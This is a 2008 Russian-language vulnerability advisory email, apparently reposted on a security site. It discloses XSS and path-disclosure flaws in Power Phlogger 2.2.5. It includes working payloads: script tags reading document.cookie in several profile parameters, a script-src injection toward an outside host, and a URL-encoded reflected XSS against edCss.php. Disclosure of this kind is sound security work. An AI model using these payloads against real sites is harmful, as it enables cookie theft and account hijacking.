Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

StanWeb.CMS (default.asp id) Remote SQL Injection Exploit

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	17.05.2008
Subject:	New vulnerabilities in Power Phlogger

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых Cross-Site Scripting и Full path disclosure уязвимостях в Power
Phlogger.

XSS (Persistent):

POST запрос на странице http://site/edUserprofile.php (возможны как GET, так и POST запросы):

</textarea><script>alert(document.cookie)</script>
В параметре: N_your_url.

"><script>alert(document.cookie)</script>
В параметре: N_email.

"><script src=http://site.com
В параметрах: N_fg_c, N_bg_c (ограничение в 30 символов).

XSS:

http://site/edCss.
php?css_str=12%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E&action=edit

Full path disclosure:

http://site/modules/usercreate.php

http://site/modules/htmlMimeMail.php

http://site/modules/img_vis_per_hour.mod.php

Уязвима версия Power Phlogger 2.2.5 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2112/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua